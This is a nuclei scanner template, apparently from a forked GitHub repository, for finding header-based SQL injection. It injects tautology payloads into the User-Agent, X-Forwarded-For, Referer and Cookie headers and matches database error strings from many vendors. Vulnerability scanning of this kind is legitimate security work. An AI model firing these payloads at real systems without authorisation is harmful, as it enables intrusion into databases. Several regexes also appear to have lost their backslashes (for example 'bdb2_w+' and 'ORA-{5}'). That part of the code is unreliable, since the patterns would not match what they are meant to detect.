forked from panch0r3d/nuclei-templates
-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathheader_sqli.yaml
67 lines (65 loc) · 5.82 KB
/
header_sqli.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
id: header-sqli
info:
name: Request header based sqli
author: panch0r3d (Thanks https://github.com/MR-pentestGuy for all of the Regexes)
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/"
redirects: true
max-redirects: 5
headers:
User-Agent: "-1/**/oR/**/1=1 1/**/aND/**/1=1 -1`oR`1`=`1 1`aND`1`=`1 or 1 like '%1'"
X-Forwarded-For: "-1/**/oR/**/1=1 1/**/aND/**/1=1 -1`oR`1`=`1 1`aND`1`=`1 or 1 like '%1'"
Referer: "-1/**/oR/**/1=1 1/**/aND/**/1=1 -1`oR`1`=`1 1`aND`1`=`1 or 1 like '%1'"
Cookie: "-1/**/oR/**/1=1 1/**/aND/**/1=1 -1`oR`1`=`1 1`aND`1`=`1 or 1 like '%1'"
matchers-condition: and
matchers:
- type: regex
regex:
- "(Transaction rollback|com.frontbase.jdbc|org.h2.jdbc|Unexpected end of command in statement|Unexpected token.*?in statement)"
- "(org.hsqldb.jdbc|CLI Driver.*?DB2|DB2 SQL error|bdb2_w+|SQLSTATE.+SQLCODE|com.ibm.db2.jcc)"
- "(Zend_Db_(Adapter|Statement)_Db2_Exception|DB2Exception|Warning.*?ifx_|Exception.*?Informix|Informix ODBC Driver)"
- "(ODBC Informix driver|com.informix.jdbc|weblogic.jdbc.informix|IfxException|Warning.*?ingres_|Ingres SQLSTATE|Ingres.*?Driver)"
- "(com.ingres.gcf.jdbc|Dynamic SQL Error|Warning.*?ibase_|org.firebirdsql.jdbc|Microsoft Access.*?Driver|JET Database Engine)"
- "(Access Database Engine|ODBC Microsoft Access|Syntax error .*?missing operator.*? in query expression|Driver.*? SQL.*? Server)"
- "(OLE DB.*? SQL Server|bSQL Server.*? Driver|Warning.*?(mssql|sqlsrv)_|SQL Server|System.Data.SqlClient.SqlException)"
- "(Exception.*?Roadhouse.Cms.|Microsoft SQL Native Client error |ODBC SQL Server Driver|ODBC Driver.*? for SQL Server)"
- "(SQLServer JDBC Driver|com.jnetdirect.jsql|macromedia.jdbc.sqlserver|Zend_Db_(Adapter|Statement)_Sqlsrv_Exception)"
- "(com.microsoft.sqlserver.jdbc|(Mssql|SqlSrv)|SQL(Srv|Server)Exception|SQL syntax.*?MySQL|Warning.*?mysqli?_)"
- "(MySQLSyntaxErrorException|valid MySQL result|check the manual that corresponds to your (MySQL|MariaDB) server version)"
- "(Unknown column .*? in .field list.|MySqlClient.|com.mysql.jdbc|Zend_Db_(Adapter|Statement)_Mysqli_Exception)"
- "(MySqlException|ORA-{5}|Oracle error|Oracle.*?Driver|Warning.*?(oci|ora)_|quoted string not properly terminated)"
- "(SQL command not properly ended|macromedia.jdbc.oracle|oracle.jdbc|Zend_Db_(Adapter|Statement)_Oracle_Exception)"
- "(OracleException|PostgreSQL.*?ERROR|Warning.*?pg|valid PostgreSQL result|Npgsql|PG.*?SyntaxError|org.postgresql.util.PSQLException)"
- "(ERROR.*?syntax error at or near|ERROR.*? parser.*? parse error at or near|PostgreSQL query failed|org.postgresql.jdbc)"
- "(PSQLException|SQL error.*?POS|Warning.*?maxdb|DriverSapDB|com.sap.dbtech.jdbc|SQLite.*?JDBCDriver|SQLite.Exception)"
- "((Microsoft|System).Data.SQLite.SQLiteException|Warning.*?(sqlite_|SQLite3)|SQLITE_ERROR|SQLite error)"
- "(sqlite3.OperationalError:|SQLite3.*?SQLException|org.sqlite.JDBC|Sqlite|SQLiteException|Warning.*?sybase_)"
- "(Sybase message|Sybase.*?Server message|SybSQLException|Sybase.Data.AseClient|com.sybase.jdbc)"
part: body
extractors:
- type: regex
part: body
regex:
- "(Transaction rollback|com.frontbase.jdbc|org.h2.jdbc|Unexpected end of command in statement|Unexpected token.*?in statement)"
- "(org.hsqldb.jdbc|CLI Driver.*?DB2|DB2 SQL error|bdb2_w+|SQLSTATE.+SQLCODE|com.ibm.db2.jcc)"
- "(Zend_Db_(Adapter|Statement)_Db2_Exception|DB2Exception|Warning.*?ifx_|Exception.*?Informix|Informix ODBC Driver)"
- "(ODBC Informix driver|com.informix.jdbc|weblogic.jdbc.informix|IfxException|Warning.*?ingres_|Ingres SQLSTATE|Ingres.*?Driver)"
- "(com.ingres.gcf.jdbc|Dynamic SQL Error|Warning.*?ibase_|org.firebirdsql.jdbc|Microsoft Access.*?Driver|JET Database Engine)"
- "(Access Database Engine|ODBC Microsoft Access|Syntax error .*?missing operator.*? in query expression|Driver.*? SQL.*? Server)"
- "(OLE DB.*? SQL Server|bSQL Server.*? Driver|Warning.*?(mssql|sqlsrv)_|SQL Server|System.Data.SqlClient.SqlException)"
- "(Exception.*?Roadhouse.Cms.|Microsoft SQL Native Client error |ODBC SQL Server Driver|ODBC Driver.*? for SQL Server)"
- "(SQLServer JDBC Driver|com.jnetdirect.jsql|macromedia.jdbc.sqlserver|Zend_Db_(Adapter|Statement)_Sqlsrv_Exception)"
- "(com.microsoft.sqlserver.jdbc|(Mssql|SqlSrv)|SQL(Srv|Server)Exception|SQL syntax.*?MySQL|Warning.*?mysqli?_)"
- "(MySQLSyntaxErrorException|valid MySQL result|check the manual that corresponds to your (MySQL|MariaDB) server version)"
- "(Unknown column .*? in .field list.|MySqlClient.|com.mysql.jdbc|Zend_Db_(Adapter|Statement)_Mysqli_Exception)"
- "(MySqlException|ORA-{5}|Oracle error|Oracle.*?Driver|Warning.*?(oci|ora)_|quoted string not properly terminated)"
- "(SQL command not properly ended|macromedia.jdbc.oracle|oracle.jdbc|Zend_Db_(Adapter|Statement)_Oracle_Exception)"
- "(OracleException|PostgreSQL.*?ERROR|Warning.*?pg|valid PostgreSQL result|Npgsql|PG.*?SyntaxError|org.postgresql.util.PSQLException)"
- "(ERROR.*?syntax error at or near|ERROR.*? parser.*? parse error at or near|PostgreSQL query failed|org.postgresql.jdbc)"
- "(PSQLException|SQL error.*?POS|Warning.*?maxdb|DriverSapDB|com.sap.dbtech.jdbc|SQLite.*?JDBCDriver|SQLite.Exception)"
- "((Microsoft|System).Data.SQLite.SQLiteException|Warning.*?(sqlite_|SQLite3)|SQLITE_ERROR|SQLite error)"
- "(sqlite3.OperationalError:|SQLite3.*?SQLException|org.sqlite.JDBC|Sqlite|SQLiteException|Warning.*?sybase_)"
- "(Sybase message|Sybase.*?Server message|SybSQLException|Sybase.Data.AseClient|com.sybase.jdbc)"